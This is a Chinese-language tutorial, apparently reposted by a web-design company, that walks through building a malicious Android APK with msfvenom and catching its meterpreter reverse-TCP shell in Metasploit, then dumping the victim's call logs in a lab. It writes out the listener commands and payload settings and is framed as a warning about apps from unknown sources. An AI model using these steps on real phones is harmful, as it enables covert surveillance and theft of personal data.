本篇文章为大家展示了如何使用Metasploit对安卓手机进行控制,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。
创新互联建站长期为上千客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为龙里企业提供专业的成都网站设计、成都网站建设,龙里网站改版等技术服务。拥有10年丰富建站经验和众多成功案例,为您定制开发。
如何使用Metasploit对安卓手机进行控制
现在大家每天的生活都离不开一样东西——手机。手机上的App给我们的生活带来了许多欢乐与便利,让我们足不出户便能知晓天下事。然而,并不是所有App都是为我们服务的,有些App可能会带着恶意去接近我们。如果你的程序是从官方应用商店下载还比较安全,若是从未知来源,如网上论坛,或者他人转发等“不靠谱”的下载链接安装,那就比较危险了。所以大部分安卓手机在你设置“允许安装未知来源App”时都会弹出如下提醒:
别小看这一道“防护栏”,他有可能会替你挡下一波又一波恶意App的进攻。也许你可能会不以为然的关掉它:我只是装个App而已,它又不会偷我的钱。
下面,我就会以一个恶意攻击者的角度来告诉你,未知来源的App有多危险!
攻击机:Kali
靶机(受害者):FreeBSD安卓4.4.2虚拟机
首先我们查看并记录Kali的ip地址:192.168.1.112.
利用Kali下的msfvenom生成恶意APK,也就是安卓程序的安装包,LHOST为Kali的ip,LPORT可随意选择一个不用的端口。
成功生成一个apk,我们先把它放着。再启动metasploit的监听器,打开msfconsole控制台(吐槽一句,为什么好多Kali下的程序都搞这么花哨的欢迎界面,大佬的世界我不懂)。
打开后,分别输入:
use exploit/multi/handler
set Payload android/meterpreter/reverse_tcp
set LHOST 192.168.1.112
set LPORT 4444
这样,就设置好了攻击模块、Payload、接收反弹连接主机的监听端口等,便可以开始攻击了。
输入exploit,等待结果。
现在,我们开始模仿受害者,通过电子邮件收到了一个未知来源的apk,名称为“hh.apk”。
开始安装,他并没有提示我“未知来源“,可能是因为这个安卓版本比较久远了,那时还没有现在这样的信息安全保护意识吧。
这样,安装完成,我们已经不知不觉的踏入了“攻击者“的陷阱中。点击应用程序,发现并没有什么响应。但其实,我们此时已经被攻击者掌控住了。
如图所示,就是受害者已经被监控的提示,图中192.168.1.100就是安卓机的ip地址。
在这个页面下,攻击者基本可以操控手机的全部功能、窃听或查看手机的全部文件。举个例子来说,上图中的“dump_call log“指令就是下载了安卓机的所有通话记录,并生成一个TXT文档。
这是我模拟手机,拨打三家通信运营商的通话记录,分别是10001、10086和10010。从图中可以清楚的看到拨打号码、通话时间与拨打接听方式。当然,能做的事远不止这些。
上述内容就是如何使用Metasploit对安卓手机进行控制,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注创新互联行业资讯频道。